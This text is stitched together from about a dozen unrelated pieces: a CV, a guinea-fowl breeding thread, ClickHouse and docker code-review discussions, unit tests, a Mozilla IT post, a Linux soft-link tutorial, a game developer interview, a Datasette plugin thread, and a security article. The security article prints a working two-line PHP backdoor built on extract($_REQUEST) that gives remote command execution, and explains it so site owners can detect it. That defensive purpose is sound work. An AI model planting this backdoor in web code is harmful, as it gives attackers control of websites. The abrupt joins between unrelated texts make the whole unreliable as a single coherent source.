As a leading member of the messaging middleware team at HSBC Bank Plc, I was responsible for designing, implementing and supporting the messaging infrastructure within HSBC Bank Plc for a large number of business services, using the IBM WebSphere family of products (WMQ, WMB, WAS, etc.) across a wide range of platforms (IBM zOS, IBM iSeries, AIX, Solaris, Linux, Windows). Other skill sets and technologies employed in this role included PKI, SSL, VCS, shell scripting, and ITM/Omegamon.
From October 2005 to July 2011 (5 years 10 months), Sheffield, United Kingdom

Software Engineer @
As an application developer, my principal responsibilities consisted of developing internet-based payment solutions using a number of technologies such as J2EE (Java, JMS, MQ, Servlets, JSP, XML, EJB), MVC, design patterns and UML, Sybase, Eclipse, Apache Tomcat, Sybase SQL, CVS, Ant, Unix/Linux scripting, etc.
From March 2000 to September 2005 (5 years 7 months), Cambridge, United Kingdom

Structural/Mathematical Analyst @
My role consisted of using mathematical and statistical methods (finite element, finite difference, stochastic calculus, Monte Carlo simulation) for modelling engineering structures.
From March 1997 to February 2000 (3 years)

Research Assistant @
I undertook research in the area of the structural integrity of composite materials. I was also in charge of teaching mathematics and computer programming to undergraduates.
From September 1994 to February 1997 (2 years 6 months), Southampton, United Kingdom

Master's Degree, Structural Engineering @ The University of Manchester, from 1991 to 1993
Bachelor's Degree, Structural Engineering @ The University of Manchester, from 1988 to 1991

Victor Katte is skilled in: Middleware Solution Architecture (WebSphere MQ, WebSphere Message Broker), Unix, Enterprise Architecture, Solaris, Middleware, SOA, WebSphere, WebSphere Application Server, SQL, Java Enterprise Edition, Integration, Shell Scripting
I have guineas and have found them to have good fertility in the temperatures that you mentioned. I would recommend against cross-breeding guineas. There are already many experienced guinea breeders creating new color varieties (the last count I saw was 34 different varieties) and I think that it is better to work on improving the varieties that already exist. In my own experience some mutts are nice, some are ugly, but most are so close to one or the other of the parent stock that most people would confuse them with purebreds. For this reason it is best to stay with purebred breeding. Breeding pens are always a good idea so that you can ensure a good fertility rate with the proper male to female ratio and only breed the better birds (not the smaller or poorly looking ones). The only cross-breeding I would recommend is creating pied guineafowl. Many people find these to be very good looking. They can be obtained by crossing any white guinea with any colored guinea (although I recommend crossing the white with something dark such as chocolate, purple, etc.), not something light like buff dundotte or porcelain, as it will be hard to see the pied effect. Be careful if you try to get pieds: make sure that you have a white guinea, as some of the light varieties can look like white guineas but won't produce a pied effect. If you think you have a white guinea, look for spots on it. If it has any spots then it is not a white but some other light colored variety. Whites do not have any spots. Hey thanks a lot you guys. Yeah those pied guineas are awful pretty. I will have to set up a breeding pen and try to match out the proper eggs. Friend says he knows he has males but isn't always 100% sure which they are. Going to be a fun week learning how to sex them and then cornering them and banding their legs appropriately. As for sexing guineas, I think the best way for most people is to listen to their calls.
The males only have a one-note alarm call and the females have a two-note call that is supposed to sound like "buckwheat". I think it takes a bit of creative interpretation to think the females sound like they are saying buckwheat, so just remember: if it makes a two-note call it is a female. The females' helmets are also lower than the males' and tend to be sloped back more; however, there can be a lot of variation in helmet size, and one of my females has a helmet bigger than that of most of my males. The males' helmets tend to be taller and point more to the center. Also, don't worry too much about having multiple males in a breeding cage. As long as they are not really closely confined they normally get along fine. If you are just starting out breeding guineas you could probably just throw all the ones of the same color that you want to breed in one pen and call it good (assuming you think you have a male and a female in the group). I have all my guineas in a common pen when I am not breeding them, to make it easier to free range them, and I have had little trouble with males fighting. I had one very aggressive one, but dinner solved that problem.
Optimize empty IN subquery and empty INNER/RIGHT JOIN. I hereby agree to the terms of the CLA available at: https://yandex.ru/legal/cla/?lang=en Category (leave one): Performance Improvement Short description (up to a few sentences): If the subquery is empty, the query can return quickly. https://github.com/yandex/ClickHouse/issues/6615 Some tests have failed. This is the normal result: SELECT count() FROM ( SELECT * FROM system.numbers LIMIT 1000 ) WHERE 1 IN ( SELECT 0 WHERE 0 ) ┌─count()─┐ │ 0 │ └─────────┘ 1 rows in set. Elapsed: 0.008 sec. Processed 1.00 thousand rows, 8.00 KB (117.63 thousand rows/s., 941.06 KB/s.) This is the result of this PR: SELECT count() FROM ( SELECT * FROM system.numbers LIMIT 1000 ) WHERE 1 IN ( SELECT 0 WHERE 0 ) Ok. 0 rows in set. Elapsed: 0.014 sec. Expression Expression CreatingSets Lazy Aggregating Concat Expression Filter Limit Expression Expression Numbers Maybe CreatingSetsBlockInputStream should not be the place that returns quickly? Because "count 0" is produced by Aggregating, should we do something before the IN or JOIN Expression? @nicelulu That becomes more interesting. To get the proper result for an aggregation query, you have to provide an empty data stream before Aggregating and not after CreatingSets. Let's think how to do it...
Maybe CreatingSetsBlockInputStream should not be the place that returns quickly? Yes, this is not the correct way of implementation. We need to check if the set is empty deeper in the query execution pipeline. @alexey-milovidov Maybe I can use the action sequence in ExpressionActions to determine an IN or JOIN? SELECT count() FROM system.numbers WHERE (number IN ( SELECT toUInt64(1) WHERE 0 )) AND (number != 1) In fact, for IN, I need to consider the short-circuit AND operation. If it is OR, I can't use this optimization. For the functional stateless test "00017_in_subquery_with_empty_result", this PR's result: SET output_format_write_statistics = 0 Ok. 0 rows in set. Elapsed: 0.004 sec. SELECT count() FROM ( SELECT * FROM system.numbers LIMIT 1000 ) WHERE 1 IN ( SELECT 0 WHERE 0 ) FORMAT JSON { "meta": [ { "name": "count()", "type": "UInt64" } ], "data": [ { "count()": "0" } ], "rows": 1, "rows_before_limit_at_least": 0 } 1 rows in set. Elapsed: 0.015 sec. 00017_in_subquery_with_empty_result.reference result: { "meta": [ { "name": "count()", "type": "UInt64" } ], "data": [ { "count()": "0" } ], "rows": 1, "rows_before_limit_at_least": 1000 } Maybe it's normal? Yes, it's perfect.
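The AND/OR distinction raised above can be illustrated outside ClickHouse. In this sketch (plain Python, purely illustrative), empty_in stands for `x IN (<empty subquery>)`, which is always false: AND-ing it lets the whole predicate short-circuit to false for every row, while OR-ing it does not, so the empty-set optimization is only safe under AND:

```python
def empty_in(_x):
    # x IN (<empty subquery>) is false for every x
    return False

rows = range(5)

# AND: the predicate is false for every row, so the scan could be skipped
assert not any(empty_in(x) and x != 1 for x in rows)

# OR: the other operand can still match, so the scan cannot be skipped
assert any(empty_in(x) or x == 3 for x in rows)
```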
#include <goldfish/schema.h>
#include <goldfish/json_reader.h>
#include "dom.h"
#include "unit_test.h"

namespace goldfish
{
    struct library_misused {};
    struct throw_on_error
    {
        static void on_error() { throw library_misused{}; }
    };

    TEST_CASE(test_filtered_map_empty_map)
    {
        auto map = json::read(stream::read_string("{}")).as_map("10", "20", "30");
        test(map.read_by_schema_index(0) == nullopt);
        seek_to_end(map);
    }

    TEST_CASE(test_filtered_map)
    {
        auto map = json::read(
            stream::read_string("{\"10\":1,\"15\":2,\"a\":\"b\",\"40\":3,\"50\":4,\"60\":5,\"80\":6}")).
            as_map("10", "20", "30", "40", "50", "60", "70", "80", "90");

        // Reading the very first key
        test(dom::load_in_memory(*map.read_by_schema_index(0)) == 1ull);

        // Reading index 1 will force a skip past entry 15 and land on entry 40
        test(map.read_by_schema_index(1) == nullopt);

        // Reading index 2 will fail because we are already at index 3 of the schema
        test(map.read_by_schema_index(2) == nullopt);

        // We are currently at index 3 but are asking for index 5; that should skip
        // the pairs 40:3 and 50:4 and find 60:5
        test(dom::load_in_memory(*map.read_by_schema_index(5)) == 5ull);

        // We ask for index 6, which brings us to index 7 (and returns null)
        test(map.read_by_schema_index(6) == nullopt);

        // Asking for index 7 should return the value of an already read key
        test(dom::load_in_memory(*map.read_by_schema_index(7)) == 6ull);

        // Finally, ask for index 8, but we reach the end of the map before we find it
        test(map.read_by_schema_index(8) == nullopt);
        seek_to_end(map);
    }

    TEST_CASE(filtered_map_skip_while_on_value)
    {
        auto map = json::read(stream::read_string("{\"20\":1}")).as_map("10", "20");
        test(map.read_by_schema_index(0) == nullopt);
        seek_to_end(map);
    }

    TEST_CASE(test_filtered_map_by_value)
    {
        auto map = json::read(stream::read_string("{\"B\":1}")).as_map("A", "B");
        test(dom::load_in_memory(*map.read("B")) == 1ull);
        seek_to_end(map);
    }

    TEST_CASE(test_missing_seek_to_end_err)
    {
        auto a = json::read(stream::read_string("[{}]"), throw_on_error{}).as_array();
        auto map = a.read().value().as_map("A", "B");
        test(map.read("A") == nullopt);

        // Even though in this particular example the map reached the end, it's still
        // invalid to read from a, because map.read("A") might have returned null
        // because "A" wasn't found (and "B" might still be in the map)
        expect_exception<library_misused>([&] { a.read(); });
    }
}
In most ways, right now at least, you can’t. We’re too closed. It’s like I said in my first blog post: IT is generally closed. Mozilla is not. There’s an incredible disconnect there. How do we leverage the expertise of the community in running some of the busiest websites in the world? In my travels over the past year I’ve met a number of passionate volunteers with IT skills who are looking for different ways to volunteer and contribute to Mozilla. In the past two months, that list has exploded. I’ve talked about how we want to reboot Air Mozilla, how we want to open video and make it possible for more people to tell the Mozilla story in video. But Mozilla IT is still closed. Help me change it? I want to illustrate what we want to do. Watch this to see how we want to pivot to open. Good question. I think I need your help to figure this out. It’s going to feel weird and uncomfortable for us. Of all the steps we set out to do nearly two months ago, this has been the most challenging. There are so many processes to work out.
- What sort of agreement should Mozilla IT volunteers sign? A code of conduct? There are some parts of the infrastructure that must remain secure and secret even as we strive to be open.
- How do we build the trust necessary to give someone root access?
- How do we on-board new Mozilla IT volunteers? Does everyone get root access on day one? Is there some graduated process? What is it?
- Do we host onsite (or remote) training events to teach you about our tools and processes?
Today, as a code contributor, we ask you to sign a Committer’s Agreement. It’s a simple document that shows you understand what it means to contribute code to Mozilla and understand our legal requirements. As part of Mozilla IT, you’ll have access to some pretty mission-critical systems. I invite you to take a look at the Mozilla IT Agreement and share your feedback with us. It’s meant to be a lightweight agreement similar to the Committer’s Agreement. Want to get involved?
We’re doing a lot of this thinking out in the open at https://wiki.mozilla.org/IT/CommunitySysadmin and I invite you to join and participate:
- Read the Mozilla IT Agreement.
- Read Dustin’s blog post on how we’re trying to identify bugs you can start working on.
- Join the Mozilla Community Directory @ https://mozillians.org/ (read this blog post if you forgot why it’s important!).
- Join the conversation on the Community IT mailing list. Help us answer these questions.
- Join the IRC channel, irc://irc.mozilla.org/it
- Actually get involved. Do IT. We have a number of positions we’re looking for you to help in.
Preparing for 2012
I want to reiterate two of the goals I mentioned in my first post nearly two months ago. My own personal goals by the end of 2012 are:
- to have 5-10 volunteer Community Sysadmins actively helping run Mozilla’s network and servers.
- to have a vibrant Community IT group…
I made the comment that it felt like the most ambitious thing we’ve done. It probably still is, but in two months we’ve shifted our way of thinking, taken Air Mozilla Mobile on the road, and gathered a long list of things you need from us. 2012 will be fun.
A link in Linux systems is a pointer to a file or a directory. There are two types of links in Linux, namely soft and hard links. In this article, we will examine soft links in detail. Similar to shortcuts in Windows, soft links, also known as symbolic links, point to a file without storing the file’s contents. Any changes made to either the file or the soft link are reflected in both versions of the file. Representation of soft links in Linux After understanding the concept of soft links, we need to know how to spot a soft link in a file-system. The 'ls' command provides a color scheme for every different component in the Linux file-system; soft links are denoted by a distinct color (cyan, in the default scheme). In the above output, 'desktop' and 'program' are soft links. It may happen that some systems have modified their default color schemes and therefore do not highlight soft links this way. Using the ls -l command, we can clearly find out the links present in a directory. Not only does it specify the links in the directory, it also displays the original file location or directory for each soft link. Similar to shortcuts in Windows, Linux provides a hint in the icons of soft links: the GUI icons for soft links contain arrow signs at the bottom-right corner. It is quite evident from the figure that the soft link named 'desktop' is a pointer to a directory whereas 'program' points to a ‘.cpp’ file. How to create a soft link in Linux? Now that we have seen the methods of spotting a soft link, we will learn how to create soft links in Linux. This is done with the help of ln -s <PATH>/<ORIGINAL_FILE> <LINK_NAME> The 'ln' command is specifically used to create a link in Linux. The '-s' option used in the above command specifies the creation of a soft link. Using the 'ls -l' command, we can check whether the creation of the soft link was successful or not. Editing the original file Since a soft link is just a symbol for the original file, any changes made in the original file will be reflected in the soft link as well.
Let us demonstrate the changes: - Original file – “my_program.cpp” in the Documents folder - Soft link – “program” on the Desktop We will use the sed command to edit the original file: sed -i "s/main/disdain/g" my_program.cpp The above command simply finds all occurrences of the word “main” and replaces each one of them with the word “disdain”. The 'program' file present on the Desktop is a soft link and therefore reflects the changes made in the original file. Editing the content through a soft link Editing the contents of a soft link reflects changes in the original file as well. This can be demonstrated by the following screenshot: As previously mentioned, 'program' is a soft link. Using the 'echo' command, we append the word “Edited” to the soft link. We can clearly see that the change happens in the original file 'my_program.cpp' as well. Note: While editing the soft link we did not use the 'sed -i' command because, in the process, the soft link is removed and a new file is created with the same name. We will see later that removing the original file and placing it back preserves the link. Identify broken soft links in Linux Soft links break when we delete the original file. When using the ‘ls’ command, broken links are displayed in red color with a black background. In the above figure, we move the original file to the current directory. When we remove the original file from its original location, we can see the change in color on the soft link. Fix broken links Every soft link points to an originating file. We can easily fix a broken link by replacing the original file with another file of the same name. I’ve demonstrated the same below. Removing a soft link in Linux The easiest way to remove a soft link is using the 'rm' command followed by the link name. There is another way to remove links in Linux: it is done by using the 'unlink' command followed by the link name. Soft link of a soft link Using the 'ln' command, let us create a soft link to our previously created soft link.
ln -s <LINK_NAME> <NEW_LINK_NAME> It is quite clear that these links form a chain. A change to any one of the links will be reflected in every one of the files. Since the continuous links form a chain, removing any of the in-between links will break the child links. For instance, if we remove the first soft link 'program', the child link will break: when we break a link in the middle, the complete chain breaks. Soft links are a common Linux feature used to link libraries and files in Linux file-systems. This article covered the creation, properties, and removal of soft links in Linux. We hope the article was easy for you to understand. Feel free to comment below with queries or suggestions.
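For reference, the whole life-cycle described above (create a link, edit through it, break it by deleting the original) can be replayed in a terminal. Filenames follow the article’s examples, and the demo assumes an empty scratch directory:

```shell
echo 'int main() {}' > my_program.cpp

ln -s my_program.cpp program   # create the soft link
ls -l program                  # shows: program -> my_program.cpp

echo '// Edited' >> program    # edit through the link...
grep Edited my_program.cpp     # ...the original file sees the change

rm my_program.cpp              # deleting the original breaks the link
[ -L program ] && [ ! -e program ] && echo 'link is broken'
```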
My first entry for NANY 2011 is: WhirlyWord This is a simple puzzle game based loosely around mating Scrabble with a slot machine. Spin the reels and try to make the words shown in the list. - Why were the NANY applications coded? (I mean, why decide to code this particular app?) I fancied doing a simple game again this year after I had quite a lot of fun coding up Twigatelle for last year's NANY. I wondered if I would be able to re-create the effect of spinning reels in a nice way, from scratch. No doubt I "discovered" a very standard way of doing that trick, but I get some satisfaction out of trying to solve these things myself. - What IDE did you use, if any? I used IntelliJ IDEA from JetBrains. It's a Java IDE I've used for years now: I'm very comfortable with it, and I find it about the nicest IDE I've personally tried. - What language(s) is the application written in? Java, and it is launched using Java Web Start from my site http://head-in-the-clouds.com - Does it rely on any 3rd party libraries / code / graphics? All of the code is my own. The graphics are all generated on-the-fly, using procedural textures that I developed last year for Twigatelle, or in the case of the reels, simple text with filters on top. Didn't even borrow any icons for this one. - Were any clever design principles used? Not really. Java 2D was not too bad to get going with in the first place, and I lifted a lot of the Twigatelle code for the basic animation of the reels. Being Java, the code is reasonably object-oriented: a bit verbose but easy to maintain. It's probably about 20,000 lines of code, although the main game loop itself is probably only about 10% of that. It's all the faffing about with loading resources, creating textures, beziers, particles etc. that adds up. - Or any really hairy algorithms that you'd like to boast about? The only "clever" thing that I think is worth mentioning is the motion blur on the reels when they are spinning.
I was pretty pleased with the effect, as I may have mentioned. - What was the trickiest part? Getting the dictionary in place. In the end I wrote a little sub-program to find seven-letter words that had at least 120 valid anagrams each, pulled from a public domain word list. - Would you like to make a mention of any other DC members who helped out? There were some nice messages from a few folks, and, in alphabetical order, I would like to particularly thank Cranioscopical, Deozaan, Mouser, and Stephen66515, who all made suggestions that I feel improved the game. I also want to thank Perry one more time, since he worked so hard on keeping all us "nanyteers" organised.
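For the curious, the dictionary-filtering idea boils down to a multiset check: a word is a valid sub-word of a seven-letter rack if its letter counts fit inside the rack's. The original sub-program was Java; this is just a hypothetical sketch of the filter in Python with a toy word list:

```python
from collections import Counter

def subwords(rack, words):
    """Words of 3+ letters that can be built from the rack's letters."""
    rack_count = Counter(rack)
    # Counter subtraction drops non-positive counts, so an empty result
    # means every letter of w is available in the rack
    return [w for w in words if len(w) >= 3 and not (Counter(w) - rack_count)]

# Toy stand-in list; the real tool pulled from a public-domain word list
words = ["eat", "tea", "ate", "rat", "tar", "art", "rate", "tear", "treat"]
found = subwords("retreat", words)
print(len(found))  # all 9 fit inside the letters of "retreat"
```

A seven-letter rack would then qualify for the game when it yielded enough such sub-words (at least 120 in the real tool).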
When a site gets compromised, the attacker will usually leave a piece of software behind that will allow them easy access to the website the next time that they visit. This type of malware is called a Backdoor and it usually allows an attacker to bypass normal authentication controls to control the website. Backdoors are typically very hard to find, usually look like normal website code, are often protected (encrypted/encoded/password protected) and can be anywhere on a website – file system or database. This particular backdoor is not new – in fact it has been around for a few years and is well documented, although it seems to have had a resurgence, with a couple of websites having been affected over the last few weeks – hence it is worth putting out the information again for web developers to be aware of. The code to search for: @extract($_REQUEST); @die($ctime($atime)); What does this code do? Well, for starters, it does not trigger alarm bells, as it does not contain any of the functions that normally allow for code execution, such as “exec”, “system”, “eval”, “assert” etc. This means that most automated signature-based malware detection systems will not find anything. So how does an attacker leverage the “extract” function? The “extract" function imports variables into the current symbol table from an array (from the PHP manual, http://php.net/manual/en/function.extract.php). Nothing seems too serious or dangerous about that? When you analyse this code: @extract($_REQUEST); it is extracting any GET or POST requests. The next bit of code: @die($ctime($atime)); is executing, inside @die, whatever the attacker sends as “ctime” with “atime” as an argument. So if an attacker wants to list all contents of a directory on a website, they enter the following url into their browser: Hey presto, the attacker has the full directory structure. What they then do is utilise additional commands, such as cat or echo, to modify files.
While not quite as feature-rich as a webshell like Filesman or P.A.S., this is a remote command execution script – very difficult to detect and highly effective. How to defend against this type of attack? In cases such as this, where the code evades detection by automated signature-based malware detection systems, additional controls and checks need to be taken. Here are a couple of tips: - File change monitoring – developers need to understand what is changing on the website from day to day. Changes made by one of your team = GOOD. Other changes = BAD, and likely to be attacker activity. Check any code that has changed that you are not aware of. - Patching – ensure your software is kept up to date. For example, the Magento Shoplift vulnerability has been out for over a year with patches available to plug it. Websites that patched quickly were not hacked. Websites that have been slow to patch are perfect targets for attackers to focus on. In fact, if you have not patched your website for the Magento Shoplift vulnerability, there is a good chance your site has been attacked and compromised by now. - Web application firewall – for those who may be unable to quickly deploy software updates, a web application firewall provides an additional layer of protection to a website and may be the difference between getting attacked and getting compromised. Get in touch if you need help with securing your website.
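As a concrete starting point for the file-change-monitoring tip, here is a minimal baseline-and-compare sketch (my own illustration, not a product): hash every file under the web root, store the snapshot, and diff it the next day. Anything added or changed that your team did not touch deserves a look:

```python
import hashlib
import os
import tempfile

def hash_tree(root):
    """SHA-256 digest of every file under root, keyed by relative path."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                digests[os.path.relpath(path, root)] = hashlib.sha256(f.read()).hexdigest()
    return digests

def diff(baseline, current):
    """Files added, removed, or changed since the baseline snapshot."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return added, removed, changed

# Demo on a throwaway directory standing in for a web root
root = tempfile.mkdtemp()
with open(os.path.join(root, "index.php"), "w") as f:
    f.write("<?php echo 'hello'; ?>")
baseline = hash_tree(root)

# An "attacker" drops a new file and tampers with an existing one
with open(os.path.join(root, "cache.php"), "w") as f:
    f.write("@extract($_REQUEST);")
with open(os.path.join(root, "index.php"), "a") as f:
    f.write("\n// tampered")

added, removed, changed = diff(baseline, hash_tree(root))
print(added, removed, changed)  # ['cache.php'] [] ['index.php']
```

In practice you would store the baseline off-server (an attacker with write access can otherwise re-baseline their own changes) and run the diff on a schedule.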
Ability to serve an Apple Photo from its place on disk A custom Datasette plugin that can be run locally on a Mac laptop which knows how to serve photos such that they can be seen in the browser. Originally posted by @simonw in https://github.com/dogsheep/photos-to-sqlite/issues/19#issuecomment-624406285 The apple_photos table has an indexed uuid column and a path column which stores the full path to that photo file on disk. I can write a custom Datasette plugin which takes the uuid from the URL, looks up the path, then serves up a thumbnail of the jpeg or heic image file. I'll prototype this as a one-off plugin first, then package it on PyPI for other people to install. The plugin can be generalized: it can be configured to know how to take the URL path, look it up in ANY table (via a custom SQL query) to get a path on disk and then serve that. Here's rendering code from my hacked-together not-yet-released S3 image proxy:

from starlette.responses import Response
from PIL import Image, ExifTags
import pyheif
...
# Load it into Pillow
if ext == "heic":
    heic = pyheif.read_heif(image_response.content)
    image = Image.frombytes(mode=heic.mode, size=heic.size, data=heic.data)
else:
    image = Image.open(io.BytesIO(image_response.content))
# Does EXIF tell us to rotate it?
try:
    exif = dict(image._getexif().items())
    if exif[ORIENTATION_TAG] == 3:
        image = image.rotate(180, expand=True)
    elif exif[ORIENTATION_TAG] == 6:
        image = image.rotate(270, expand=True)
    elif exif[ORIENTATION_TAG] == 8:
        image = image.rotate(90, expand=True)
except (AttributeError, KeyError, IndexError):
    pass
# Resize based on ?w= and ?h=, if set
width, height = image.size
w = request.query_params.get("w")
h = request.query_params.get("h")
if w is not None or h is not None:
    if h is None:
        # Set h based on w
        w = int(w)
        h = int((float(height) / width) * w)
    elif w is None:
        # Set w based on h
        h = int(h)
        w = int((float(width) / height) * h)
    w = int(w)
    h = int(h)
    image.thumbnail((w, h))
# ?bw= converts to black and white
if request.query_params.get("bw"):
    image = image.convert("L")
# ?q= sets the quality - defaults to 75
quality = 75
q = request.query_params.get("q")
if q and q.isdigit() and 1 <= int(q) <= 100:
    quality = int(q)
# Output as JPEG or PNG
output_image = io.BytesIO()
image_type = "JPEG"
kwargs = {"quality": quality}
if image.format == "PNG":
    image_type = "PNG"
    kwargs = {}
image.save(output_image, image_type, **kwargs)
return Response(
    output_image.getvalue(),
    media_type="image/jpeg",
    headers={"cache-control": "s-maxage={}, public".format(365 * 24 * 60 * 60)},
)

datasette-media will be able to handle this once I implement https://github.com/simonw/datasette-media/issues/3 As that seems to be closed, can you give a hint on how to make this work? Sure, I should absolutely document this! I'll add a proper section to the README, but for the moment here's how I do this. First, install datasette and the datasette-media plugin.
Create a metadata.yaml file with the following content:

    plugins:
      datasette-media:
        photo:
          sql: |-
            select path as filepath, 200 as resize_height
            from apple_photos where uuid = :key
        photo-big:
          sql: |-
            select path as filepath, 1024 as resize_height
            from apple_photos where uuid = :key

Now run datasette -m metadata.yaml photos.db - thumbnails will be served at http://<IP_ADDRESS>:8001/-/media/photo/F4469918-13F3-43D8-9EC1-734C0E6B60AD and larger sizes of the image at http://<IP_ADDRESS>:8001/-/media/photo-big/A8B02C7D-365E-448B-9510-69F80C26304D

I also made myself two custom pages, one showing recent images and one showing random images. To do this, install the datasette-template-sql plugin and then create a templates/pages directory and add these files:

recent-photos.html

    <h1>Recent photos</h1>
    <div>
    {% for photo in sql("select * from apple_photos order by date desc limit 100") %}
        <img src="/-/media/photo/{{ photo['uuid'] }}">
    {% endfor %}
    </div>

random-photos.html

    <h1>Random photos</h1>
    <div>
    {% for photo in sql("with foo as (select * from apple_photos order by date desc limit 5000) select * from foo order by random() limit 100") %}
        <img src="/-/media/photo/{{ photo['uuid'] }}">
    {% endfor %}
    </div>

Now run datasette -m metadata.yaml photos.db --template-dir=templates/

Visit http://<IP_ADDRESS>:8001/random-photos to see some random photos or http://<IP_ADDRESS>:8002/recent-photos for recent photos.

This is using this mechanism: https://datasette.readthedocs.io/en/stable/custom_templates.html#custom-pages

https://github.com/dogsheep/dogsheep-photos/blob/dc43fa8653cb9c7238a36f52239b91d1ec916d5c/README.md#serving-photos-locally-with-datasette-media

I'll add docs on using datasette-json-html too. https://github.com/dogsheep/dogsheep-photos/blob/0.4.1/README.md#serving-photos-locally-with-datasette-media
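The ?w=/?h= resize arithmetic in the proxy snippet earlier reduces to a small aspect-ratio calculation. Here it is pulled out as a standalone sketch; the function name is mine, not part of datasette-media.

```python
def thumbnail_size(width, height, w=None, h=None):
    """Derive a target (w, h) preserving aspect ratio when only one
    of ?w= / ?h= is supplied, mirroring the proxy code's logic."""
    if w is None and h is None:
        return width, height
    if h is None:
        # Scale height to match the requested width
        w = int(w)
        h = int((float(height) / width) * w)
    elif w is None:
        # Scale width to match the requested height
        h = int(h)
        w = int((float(width) / height) * h)
    return int(w), int(h)
```

For a 400x200 source, requesting w=100 yields (100, 50), and requesting h=100 yields (200, 100); Pillow's `Image.thumbnail` then never exceeds that bounding box.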
GITHUB_ARCHIVE
package io.keepcoding.everpobre;

import android.database.Cursor;
import android.test.AndroidTestCase;

import io.keepcoding.everpobre.model.Note;
import io.keepcoding.everpobre.model.Notebook;
import io.keepcoding.everpobre.model.dao.NoteDAO;
import io.keepcoding.everpobre.model.dao.NotebookDAO;
import io.keepcoding.everpobre.model.db.DBConstants;

public class NoteDAOTests extends AndroidTestCase {

    public void testInsert() {
        NotebookDAO notebookDao = new NotebookDAO(getContext());
        Notebook notebook = new Notebook("Notebook");
        notebookDao.insert(notebook);

        NoteDAO noteDao = new NoteDAO(getContext());
        Note note = new Note(notebook, "To dos");

        Cursor c = noteDao.queryCursor();
        assertNotNull(c);
        int numRecords = c.getCount();

        assertNotNull(notebook);
        assertNotNull(noteDao);
        noteDao.insert(note);

        c = noteDao.queryCursor();
        assertTrue(numRecords + 1 == c.getCount());
    }

    public void testDelete() {
        NotebookDAO notebookDao = new NotebookDAO(getContext());
        Notebook notebook = new Notebook("Notebook");
        notebookDao.insert(notebook);

        NoteDAO noteDao = new NoteDAO(getContext());
        assertNotNull(noteDao);
        for (int i = 0; i < 10; i++) {
            Note note = new Note(notebook, "To do " + i);
            assertNotNull(note);
            noteDao.insert(note);
        }

        Cursor c = noteDao.queryCursor();
        assertNotNull(c);
        int numRecords = c.getCount();
        assertTrue(numRecords > 0);

        c.moveToFirst();
        noteDao.delete(c.getLong(c.getColumnIndex(DBConstants.KEY_NOTE_ID)));
        c.close();

        c = noteDao.queryCursor();
        assertTrue(numRecords - 1 == c.getCount());
    }

    public void testDeleteAll() {
        NoteDAO noteDao = new NoteDAO(getContext());
        assertNotNull(noteDao);
        noteDao.deleteAll();

        Cursor c = noteDao.queryCursor();
        assertNotNull(c);
        int numRecords = c.getCount();
        assertTrue(numRecords == 0);
    }

    public void testUpdateNote() {
        NotebookDAO notebookDao = new NotebookDAO(getContext());
        Notebook notebook = new Notebook("Notebook");
        notebookDao.insert(notebook);

        NoteDAO noteDao = new NoteDAO(getContext());
        assertNotNull(noteDao);

        Note note = new Note(notebook, "Update me! ");
        assertNotNull(note);
        long insertedId = noteDao.insert(note);

        note = noteDao.query(insertedId);
        assertNotNull(note);

        note.setText("Updated!");
        noteDao.update(insertedId, note);

        note = noteDao.query(insertedId);
        assertNotNull(note);
        assertEquals("Updated!", note.getText());
    }
}
STACK_EDU
docker trust: view, revoke, sign subcommands (experimental) #472

In this PR, we introduce three subcommands:

Several copyedit-style comments. In addition, scrub all occurrences of "like so", "please", and future-facing prose like "will sign" or "will create". In docs, we live in the eternal present and we don't say "please". :) Likewise, the phrase "note that". This is a big change so I looked over the first two commands for now.

Re: testing, I think the tests you have look great, but we need to fake the notary client so we're not actually making HTTP requests in unit tests. An end-to-end test for each of the commands (inspect, revoke, sign) would be great as well. We'll want to add a notary service to compose-env.yaml so we're testing against an isolated service. I think that can be done in a separate follow-up PR. We just merged https://github.com/docker/cli/blob/master/TESTING.md which has a bit more information as well.

@dnephin: thank you for the review! I've addressed all comments except for the following:

Some small updates: I've made a couple of tweaks to address small discrepancies in CLI output, and we also have an interface for a trust repository incoming from Notary (theupdateframework/notary#1220) that will help provide testable mocks for this PR. I'll update here once that is merged and vendored.

LGTM, left a couple comments. I think maybe for the tests we should stick to the alice/bob/claire convention and not use real names. Also had a question about two of the tests that seem to be really testing for the same condition...

Sorry for being late in reviewing (catching up after my vacation).
I gave this PR a spin, and wrote up more from a UX perspective after playing around with it. Some inconsistencies from a UX perspective:

docker trust inspect doesn't default to :latest

docker trust inspect without specifying a :tag lists all tags for the repository. This is inconsistent with other commands, which default to :latest if the tag is omitted. For comparison, docker pull requires adding the --all-tags flag to pull all tags from the repository:

    docker pull --help

    Usage:  docker pull [OPTIONS] NAME[:TAG|@DIGEST]

    Pull an image or a repository from a registry

    Options:
      -a, --all-tags                Download all tagged images in the repository
          --disable-content-trust   Skip image verification (default true)
          --help                    Print usage

docker trust inspect should use the same approach: inspect :latest by default, and have an --all-tags flag to fetch all tags.

sha256: prefix missing for digests

docker image ls --digests includes the sha256: prefix in the DIGEST column. We should probably print it here as well (also in case other hashing is used in future?).

REPOSITORY column in output of docker trust inspect

Also for consistency; perhaps we should have a TAG column in the output; more consistent with docker images, and it would allow accepting multiple repositories as argument in future (docker trust inspect <repo1> <repo2>).

Is there a way to show unsigned tags in a repository?

Thinking out loud here: as a user, I may be interested to check which tags in a repository are not yet signed (so that I can sign them). Once a --filter option is added, those could be omitted (or included, if the default should be to only show signed tags).
    $ docker trust inspect myname/myrepo
    REPOSITORY      TAG      DIGEST                                                             SIGNERS
    myname/myrepo   latest   99ccecf3da28a93c063d5dddcdf69aeed44826d0db219aabc3d5178d47649dfa   (Repo Admin)
    myname/myrepo   v1.0.0   974c59c89665e01151571c6a50c0b7ef0bee941ef16d81ced1cf29073547ea8a   <none>
    myname/myrepo   v1.0.1   7713b80b59cfc144ef87b3f272d156ce2dbf0f6b3ec4c1171c0c3d8b2ac229b7   <none>

Output format of docker trust inspect

